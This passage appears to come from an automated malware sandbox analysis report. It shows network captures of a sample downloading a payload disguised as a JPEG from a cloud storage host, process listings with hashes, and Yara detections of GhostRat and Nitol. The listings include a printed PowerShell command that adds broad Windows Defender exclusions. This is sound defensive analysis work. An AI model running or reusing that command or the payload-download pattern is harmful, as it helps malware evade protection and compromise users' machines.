72 71 21 ac 27 9c 86 dd cb e3 cd f6 Data Ascii: LRLTZt;.H,&G,Vf,ZA,l?;G-w'oy<d(?#;u `&zVOR(9I"L#iLaTnL_Hkt&<0GUX7?)}/zT::;Dd~Q_rJd}om$'\{IHSnLJrq!'
2024-10-02 02:28:40 UTC	4096	IN	Data Raw: cc fe 72 9a 73 0a 68 5d fd c1 97 9e ce 00 0f 9b 31 47 65 2d 25 7a ab 7b f3 ec e5 fd 15 1e 73 6f a3 80 1d c5 7d 3a 83 bb ab bc ad b9 55 12 db e7 cb 2c ed cd 9d c6 0b 7b 93 94 7c cb 84 cd 67 52 ec b9 97 e1 06 ef 4c 79 df fe d4 a5 f7 9d 6e 9b 9c ad cf ea 44 09 17 61 c6 17 ac 89 cf e6 9c cd af fa a2 4c ce 9c b8 bf 9d 16 f3 cc 74 ea 3a 03 06 97 37 a3 98 28 59 fc 9d e9 ba f1 3d 33 1e cb a1 91 81 9f 4c 91 b0 06 17 be f3 5c 54 77 eb cd e2 32 fc 9f 65 24 13 f1 bc 29 93 ff 65 8b f8 1b d3 e2 b1 52 61 a5 bb 1c 14 de bd 4d 4b 57 b5 9e dc ea 00 f1 b1 16 8a 41 91 e1 e4 40 96 e8 d7 40 be 4c 50 9e f1 0e 90 a7 1f f0 3a ff d2 92 e7 d7 ec 5b 1b bc bc 7e 1d f0 82 86 64 10 90 e7 22 4b be ed c7 f8 ec 39 a7 92 58 bf d2 c9 c2 62 db 35 90 72 e9 6b 60 27 18 0a 16 a5 b0 7e 81 13 9c Data Ascii: rsh]1Ge-%z{so}:U,{\|gRLynDaLt:7(Y=3L\Tw2e$)eRaMKWA@@LP:[~d"K9Xb5rk`'~
2024-10-02 02:28:40 UTC	4096	IN	Data Raw: dd da 14 e1 78 87 2d 34 17 3c 79 ff be ae ac ee 50 7b 6b 79 b4 b0 48 a7 46 6a 4e 55 40 ac 20 1b 76 6a 9e d5 60 04 e0 c7 5e 7a 26 71 80 f0 68 6b 0e 42 46 a9 40 7c 50 67 0e d6 5b 30 c9 9e 9b 99 b8 46 17 f1 7b 9c 79 5a 6b cd e8 f2 5f 45 03 d8 39 06 23 61 48 0e bf c9 ab cc 19 52 0b c5 e0 7a cf 2b 34 ee 49 bb 2f 94 0d b6 9b 9b e2 51 fd 04 59 38 2c c3 39 e3 e3 e3 cc 62 68 7e f8 ed 75 fe f3 da 62 d8 c3 6d 7d 64 ff e4 3c 08 4f 28 6b 22 a1 65 f3 d6 e6 85 bf 0d 19 c4 2e 60 93 c5 b1 e7 37 1e ba df c6 d7 fc c4 89 e4 2f 3f 5a ed 33 eb db 0b fc 2f c9 34 78 11 72 c8 de ed 63 5f 44 4c 7a 50 c6 eb 58 4f 39 6d 79 64 f9 8c 9f 75 3b f0 9d 7d e0 fd be f0 15 1b 06 3d 8c 14 db 91 c4 c8 ab bf a6 fe 2f fb 91 02 e8 40 d3 e0 2a d0 14 aa 6f c7 90 33 14 55 d9 f8 8b 9f c6 6c be ad 99 Data Ascii: x-4<yP{kyHFjNU@ vj`^z&qhkBF@\|Pg[0F{yZk_E9#aHRz+4I/QY8,9bh~ubm}d<O(k"e.`7/?Z3/4xrc_DLzPXO9mydu;}=/@*o3Ul
2024-10-02 02:28:40 UTC	4096	IN	Data Raw: 53 15 37 d8 2b 3e 79 31 be a5 67 f3 3a b4 bf da c3 46 b6 eb 2d a7 d2 96 53 51 53 51 44 bb 84 a0 9f d8 e3 71 7f 8b b8 e4 a1 35 19 67 69 90 3d 32 0d 65 6d 9c fd 8e a0 55 f0 eb 5c a0 f0 4d ce e2 74 7f 80 55 cf 44 ba 6f b0 0f 45 bd 3c fe 10 25 56 38 8c 4d 4f e1 4b a6 3b 7c a7 d7 45 a4 f2 38 b4 63 f0 b5 02 5e ec 25 4e 67 ca 50 13 5a 87 f4 d7 5c 5f 98 77 24 65 d0 5c 9c d7 50 0a 39 33 31 37 d9 47 6e 34 31 8a 03 91 8a 9e ba 40 e9 40 c4 73 fa 35 90 b7 57 a4 89 dc d5 54 09 4d 55 d8 99 a3 51 69 71 fe b7 71 71 77 71 15 86 9f 37 a4 83 90 55 77 f8 60 ec 27 37 5c 93 bb d4 d6 27 33 d8 3c d8 2b 31 b4 85 3d 21 d8 14 d8 f0 ab f5 d6 7e 56 0e d7 d1 df d1 5a e6 bf 43 f9 d8 72 7c 97 d5 e7 18 93 ad fa f1 78 b5 d2 f1 78 8c cb 39 7a 63 c2 d1 f5 9c 0c d1 ce 9b 4b be e1 b8 78 35 6a Data Ascii: S7+>y1g:F-SQSQDq5gi=2emU\MtUDoE<%V8MOK;\|E8c^%NgPZ\_w$e\P9317Gn41@@s5WTMUQiqqqwq7Uw`'7\'3<+1=!~VZCr\|xx9zcKx5j
2024-10-02 02:28:40 UTC	4096	IN	Data Raw: ba 25 c4 bf 9e 67 a9 da f5 68 14 5c b8 ef 02 c1 14 cb 7f e8 e3 a6 09 60 7a c8 bb ef 88 80 8c 8e 88 e6 bf 8f 71 11 63 9b dc 79 69 a5 c6 6f 43 1b 08 01 29 0d 0a 7f 37 33 7c c1 f9 ed de 07 0f cb 24 f9 9d 1d 46 87 93 43 40 39 35 9b 0c 15 bf 8a fc b9 0f 69 ee 07 d4 e1 47 66 cc bd bf f5 9e 7b 1c 2d b7 a2 4c 01 4f 39 fe 6f e4 21 1f 26 1c 4d 77 b0 8a 3c 90 59 9b ff 99 46 f4 80 ef 70 ff fa 53 77 f4 fd 62 59 27 19 24 72 71 17 b9 81 ca 12 5c 89 2b 58 44 f5 4b 35 11 96 9d 6c 70 ec 06 f7 bf 10 8c 67 5f 27 45 23 69 2b d2 18 26 dd 26 14 99 59 be 62 0e 9e ed f8 55 9d 23 5a da d5 ec db 3d 70 e1 cb d8 74 6e ea 2f 7f 6b 4c 97 f8 28 6a 61 b2 b8 ae f3 c0 c0 be 1e 4c ec 3f c9 5d c7 b4 2a 7e 55 92 94 8e d1 e5 d6 6e ae d9 72 c7 eb 29 ad 0f 7c c7 5b 66 b0 ba 28 f2 7e 7e 1c 16 f8 Data Ascii: %gh\`zqcyioC)73\|$FC@95iGf{-LO9o!&Mw<YFpSwbY'$rq\+XDK5lpg_'E#i+&&YbU#Z=ptn/kL(jaL?]*~Unr)\|[f(~~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49750	118.178.60.61	443	4452	C:\Users\user\AppData\Roaming\8AfroU.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:28:52 UTC	115	OUT	GET /FOM-53.jpg HTTP/1.1 User-Agent: GetData Host: 10mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:28:53 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:28:52 GMT Content-Type: image/jpeg Content-Length: 366410 Connection: close x-oss-request-id: 66FCAFE46A91E534366845DA Accept-Ranges: bytes ETag: "DA1D5EB665D3AAD523BE59415E6449ED" Last-Modified: Tue, 24 Sep 2024 05:37:03 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 5641369857548672686 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q== x-oss-server-time: 2
2024-10-02 02:28:53 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-10-02 02:28:53 UTC	4096	IN	Data Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 Data Ascii: ```````````````````````````````````````````````````````````````
2024-10-02 02:28:53 UTC	4096	IN	Data Raw: 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 e5 Data Ascii: ``%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
2024-10-02 02:28:53 UTC	4096	IN	Data Raw: 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 9f Data Ascii: 12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
2024-10-02 02:28:53 UTC	4096	IN	Data Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 e5 Data Ascii: NNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
2024-10-02 02:28:53 UTC	4096	IN	Data Raw: 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 20 Data Ascii: bpa```b=57%h%8f<`-=S+8-<H/c$m\|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
2024-10-02 02:28:53 UTC	4096	IN	Data Raw: 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d 9f Data Ascii: ``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
2024-10-02 02:28:53 UTC	4096	IN	Data Raw: ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 ac Data Ascii: 5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
2024-10-02 02:28:53 UTC	4096	IN	Data Raw: e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 3d Data Ascii: jebp````]bp`At``_l+-D^__H\|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`=
2024-10-02 02:28:53 UTC	4096	IN	Data Raw: 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 32 Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka\|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp2

Target ID:	0
Start time:	22:26:59
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\setup.ic19.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\setup.ic19.exe"
Imagebase:	0x140000000
File size:	350'144 bytes
MD5 hash:	E1C81C53C0FCD8301A0A51CDB1669CCC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:27:42
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\8AfroU.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\8AfroU.exe
Imagebase:	0x400000
File size:	137'240 bytes
MD5 hash:	43A2E3DC4152AE380E60A53765B78787
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:28:01
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\8AfroU.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\8AfroU.exe
Imagebase:	0x400000
File size:	137'240 bytes
MD5 hash:	43A2E3DC4152AE380E60A53765B78787
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	22:28:53
Start date:	01/10/2024
Path:	C:\Program Files (x86)\lXAMaI\lXAMaI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\lXAMaI\lXAMaI.exe"
Imagebase:	0x430000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	22:28:55
Start date:	01/10/2024
Path:	C:\Program Files (x86)\lXAMaI\lXAMaI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\lXAMaI\lXAMaI.exe"
Imagebase:	0x430000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:28:56
Start date:	01/10/2024
Path:	C:\Program Files (x86)\eL62Gl4\80c2T80R.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\eL62Gl4\80c2T80R.exe"
Imagebase:	0x420000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:28:57
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\xxxx.ini
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:28:57
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:29:01
Start date:	01/10/2024
Path:	C:\Program Files (x86)\eL62Gl4\80c2T80R.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\eL62Gl4\80c2T80R.exe"
Imagebase:	0x420000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:29:01
Start date:	01/10/2024
Path:	C:\Program Files (x86)\lXAMaI\lXAMaI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\lXAMaI\lXAMaI.exe"
Imagebase:	0x430000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:29:25
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force
Imagebase:	0x230000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:29:25
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:29:27
Start date:	01/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	22:30:00
Start date:	01/10/2024
Path:	C:\Program Files (x86)\eL62Gl4\80c2T80R.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\eL62Gl4\80c2T80R.exe"
Imagebase:	0x420000
File size:	54'152 bytes
